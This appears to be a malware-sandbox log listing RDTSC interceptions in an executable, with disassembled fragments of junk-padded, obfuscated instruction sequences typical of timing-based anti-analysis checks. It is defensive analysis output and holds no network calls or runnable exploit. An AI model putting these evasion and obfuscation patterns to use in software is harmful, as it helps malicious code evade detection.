Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F012C second address: 53F013B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F013B second address: 53F0141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F0141 second address: 53F01A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1430h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b push eax 0x0000000c mov edi, 57510370h 0x00000011 pop edi 0x00000012 pushfd 0x00000013 jmp 00007F17B0CB1436h 0x00000018 xor ax, 6BB8h 0x0000001d jmp 00007F17B0CB142Bh 0x00000022 popfd 0x00000023 popad 0x00000024 mov ebp, esp 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F17B0CB1435h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 53F021B second address: 53F0221 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A1E second address: 5410A22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A22 second address: 5410A26 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A26 second address: 5410A2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A2C second address: 5410A32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A32 second address: 5410A61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F17B0CB1437h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410A61 second address: 5410AAA instructions: 0x00000000 rdtsc 0x00000002 call 00007F17B0FBC278h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebx, 2391E316h 0x0000000f popad 0x00000010 xchg eax, ebp 0x00000011 jmp 00007F17B0FBC26Dh 0x00000016 mov ebp, esp 0x00000018 jmp 00007F17B0FBC26Eh 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushad 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AAA second address: 5410AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AAF second address: 5410AB5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410AB5 second address: 5410AB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54106B8 second address: 54106C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54106C8 second address: 54106CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410550 second address: 5410556 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410556 second address: 541055C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 541055C second address: 5410560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54102D5 second address: 5410308 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1437h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F17B0CB1435h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410308 second address: 5410318 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC26Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5410318 second address: 541035B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F17B0CB142Eh 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F17B0CB1430h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F17B0CB1437h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200D5 second address: 54200ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0FBC274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200ED second address: 54200F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54200F1 second address: 5420172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebp 0x00000009 pushad 0x0000000a mov ch, D0h 0x0000000c pushfd 0x0000000d jmp 00007F17B0FBC26Fh 0x00000012 sub cl, 0000003Eh 0x00000015 jmp 00007F17B0FBC279h 0x0000001a popfd 0x0000001b popad 0x0000001c mov dword ptr [esp], ebp 0x0000001f pushad 0x00000020 pushfd 0x00000021 jmp 00007F17B0FBC26Ch 0x00000026 sbb esi, 4F110E38h 0x0000002c jmp 00007F17B0FBC26Bh 0x00000031 popfd 0x00000032 mov si, 7C6Fh 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 jmp 00007F17B0FBC272h 0x0000003e pop ebp 0x0000003f pushad 0x00000040 mov eax, 26DF632Dh 0x00000045 push eax 0x00000046 push edx 0x00000047 push eax 0x00000048 push edx 0x00000049 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420172 second address: 5420176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450EB7 second address: 5450F17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F17B0FBC26Ah 0x0000000a jmp 00007F17B0FBC275h 0x0000000f popfd 0x00000010 popad 0x00000011 mov dx, ax 0x00000014 popad 0x00000015 push eax 0x00000016 jmp 00007F17B0FBC26Dh 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d mov bx, ax 0x00000020 mov cx, 971Fh 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F17B0FBC272h 0x0000002c pop ebp 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov ecx, ebx 0x00000032 mov cx, dx 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450F17 second address: 5450F1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5430314 second address: 543031C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 543031C second address: 54303F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1434h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0CB142Eh 0x00000011 jmp 00007F17B0CB1435h 0x00000016 popfd 0x00000017 mov edi, ecx 0x00000019 popad 0x0000001a mov ebp, esp 0x0000001c jmp 00007F17B0CB142Ah 0x00000021 mov eax, dword ptr [ebp+08h] 0x00000024 pushad 0x00000025 mov cl, 65h 0x00000027 mov bx, E61Eh 0x0000002b popad 0x0000002c and dword ptr [eax], 00000000h 0x0000002f pushad 0x00000030 pushad 0x00000031 push edx 0x00000032 pop ecx 0x00000033 pushfd 0x00000034 jmp 00007F17B0CB1439h 0x00000039 sub ax, CC56h 0x0000003e jmp 00007F17B0CB1431h 0x00000043 popfd 0x00000044 popad 0x00000045 popad 0x00000046 and dword ptr [eax+04h], 00000000h 0x0000004a pushad 0x0000004b pushfd 0x0000004c jmp 00007F17B0CB142Ch 0x00000051 jmp 00007F17B0CB1435h 0x00000056 popfd 0x00000057 movzx esi, dx 0x0000005a popad 0x0000005b pop ebp 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f mov di, cx 0x00000062 call 00007F17B0CB1430h 0x00000067 pop eax 0x00000068 popad 0x00000069 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104B1 second address: 54104B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104B7 second address: 54104D6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1434h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54104D6 second address: 54104DC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420D99 second address: 5420DB5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1438h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5420DB5 second address: 5420DF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC274h 0x00000011 add cl, 00000018h 0x00000014 jmp 00007F17B0FBC26Bh 0x00000019 popfd 0x0000001a movzx eax, bx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov bl, ch 0x00000025 mov si, di 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450670 second address: 54506F3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F17B0CB1437h 0x00000008 pushfd 0x00000009 jmp 00007F17B0CB1438h 0x0000000e or cl, 00000028h 0x00000011 jmp 00007F17B0CB142Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, ebp 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007F17B0CB1434h 0x00000022 sub al, FFFFFF88h 0x00000025 jmp 00007F17B0CB142Bh 0x0000002a popfd 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007F17B0CB1436h 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54506F3 second address: 545077C instructions: 0x00000000 rdtsc 0x00000002 mov ah, DCh 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F17B0FBC278h 0x00000010 jmp 00007F17B0FBC275h 0x00000015 popfd 0x00000016 jmp 00007F17B0FBC270h 0x0000001b popad 0x0000001c jmp 00007F17B0FBC272h 0x00000021 popad 0x00000022 xchg eax, ebp 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007F17B0FBC26Eh 0x0000002a or ch, 00000008h 0x0000002d jmp 00007F17B0FBC26Bh 0x00000032 popfd 0x00000033 movzx eax, dx 0x00000036 popad 0x00000037 mov ebp, esp 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545077C second address: 5450782 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450782 second address: 5450788 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450788 second address: 545078C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545078C second address: 5450790 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450790 second address: 54507B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F17B0CB1439h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54507B4 second address: 54507F3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC271h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ecx 0x0000000c jmp 00007F17B0FBC26Eh 0x00000011 mov eax, dword ptr [76FB65FCh] 0x00000016 pushad 0x00000017 jmp 00007F17B0FBC26Eh 0x0000001c push eax 0x0000001d push edx 0x0000001e mov dx, si 0x00000021 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54507F3 second address: 5450819 instructions: 0x00000000 rdtsc 0x00000002 mov dl, cl 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 test eax, eax 0x00000009 pushad 0x0000000a mov eax, ebx 0x0000000c mov ecx, ebx 0x0000000e popad 0x0000000f je 00007F182279458Ah 0x00000015 pushad 0x00000016 movsx edi, si 0x00000019 mov si, C391h 0x0000001d popad 0x0000001e mov ecx, eax 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450819 second address: 545081D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545081D second address: 5450823 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450823 second address: 5450897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F17B0FBC26Eh 0x00000009 jmp 00007F17B0FBC275h 0x0000000e popfd 0x0000000f call 00007F17B0FBC270h 0x00000014 pop ecx 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 xor eax, dword ptr [ebp+08h] 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov eax, edx 0x00000020 pushfd 0x00000021 jmp 00007F17B0FBC26Fh 0x00000026 sbb cx, 2E3Eh 0x0000002b jmp 00007F17B0FBC279h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450897 second address: 54508A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54508A7 second address: 5450921 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b and ecx, 1Fh 0x0000000e pushad 0x0000000f mov bx, cx 0x00000012 call 00007F17B0FBC270h 0x00000017 mov edx, eax 0x00000019 pop esi 0x0000001a popad 0x0000001b ror eax, cl 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F17B0FBC273h 0x00000024 sbb cx, 1E5Eh 0x00000029 jmp 00007F17B0FBC279h 0x0000002e popfd 0x0000002f jmp 00007F17B0FBC270h 0x00000034 popad 0x00000035 leave 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450921 second address: 5450925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450925 second address: 5450929 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450929 second address: 545092F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545092F second address: 5450999 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC274h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 retn 0004h 0x0000000c nop 0x0000000d mov esi, eax 0x0000000f lea eax, dword ptr [ebp-08h] 0x00000012 xor esi, dword ptr [00CA4014h] 0x00000018 push eax 0x00000019 push eax 0x0000001a push eax 0x0000001b lea eax, dword ptr [ebp-10h] 0x0000001e push eax 0x0000001f call 00007F17B57AB460h 0x00000024 push FFFFFFFEh 0x00000026 jmp 00007F17B0FBC270h 0x0000002b pop eax 0x0000002c jmp 00007F17B0FBC270h 0x00000031 ret 0x00000032 nop 0x00000033 push eax 0x00000034 call 00007F17B57AB47Dh 0x00000039 mov edi, edi 0x0000003b jmp 00007F17B0FBC270h 0x00000040 xchg eax, ebp 0x00000041 jmp 00007F17B0FBC270h 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 pushad 0x0000004a push esi 0x0000004b pop edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450999 second address: 545099E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 545099E second address: 5450A1A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F17B0FBC274h 0x00000011 sbb cx, CB08h 0x00000016 jmp 00007F17B0FBC26Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F17B0FBC278h 0x00000022 and ax, 6D68h 0x00000027 jmp 00007F17B0FBC26Bh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F17B0FBC270h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450A1A second address: 5450A29 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB142Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5450A29 second address: 5450A59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F17B0FBC275h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pop ebp 0x0000000e pushad 0x0000000f jmp 00007F17B0FBC26Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 movzx eax, bx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400013 second address: 5400044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 pushfd 0x00000007 jmp 00007F17B0CB142Ch 0x0000000c sbb ecx, 6C073048h 0x00000012 jmp 00007F17B0CB142Bh 0x00000017 popfd 0x00000018 pop ecx 0x00000019 popad 0x0000001a push esp 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e mov esi, ebx 0x00000020 movsx ebx, ax 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400044 second address: 540004A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540004A second address: 54000C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0CB1431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], ebp 0x0000000e jmp 00007F17B0CB142Eh 0x00000013 mov ebp, esp 0x00000015 jmp 00007F17B0CB1430h 0x0000001a and esp, FFFFFFF8h 0x0000001d jmp 00007F17B0CB1430h 0x00000022 xchg eax, ecx 0x00000023 pushad 0x00000024 mov esi, 65329ABDh 0x00000029 pushfd 0x0000002a jmp 00007F17B0CB142Ah 0x0000002f or esi, 65F51A98h 0x00000035 jmp 00007F17B0CB142Bh 0x0000003a popfd 0x0000003b popad 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f pushad 0x00000040 mov ebx, esi 0x00000042 push ecx 0x00000043 pop edi 0x00000044 popad 0x00000045 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54000C5 second address: 54000F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 jmp 00007F17B0FBC275h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F17B0FBC26Dh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 54000F2 second address: 5400102 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F17B0CB142Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400102 second address: 540012B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F17B0FBC26Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F17B0FBC275h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540012B second address: 5400148 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, cx 0x00000006 push eax 0x00000007 pop edx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d movsx edi, si 0x00000010 push esi 0x00000011 mov ebx, 1470582Eh 0x00000016 pop edx 0x00000017 popad 0x00000018 xchg eax, ebx 0x00000019 pushad 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400148 second address: 5400172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cl, 4Bh 0x00000006 popad 0x00000007 jmp 00007F17B0FBC279h 0x0000000c popad 0x0000000d mov ebx, dword ptr [ebp+10h] 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400172 second address: 5400176 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 5400176 second address: 540017C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe RDTSC instruction interceptor: First address: 540017C second address: 54001F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, 7A17E897h 0x00000008 pushfd 0x00000009 jmp 00007F17B0CB142Ch 0x0000000e add al, 00000008h 0x00000011 jmp 00007F17B0CB142Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b jmp 00007F17B0CB1436h 0x00000020 push eax 0x00000021 pushad 0x00000022 pushfd 0x00000023 jmp 00007F17B0CB142Dh 0x00000028 jmp 00007F17B0CB142Bh 0x0000002d popfd 0x0000002e popad 0x0000002f xchg eax, esi 0x00000030 jmp 00007F17B0CB1436h 0x00000035 mov esi, dword ptr [ebp+08h] 0x00000038 pushad 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
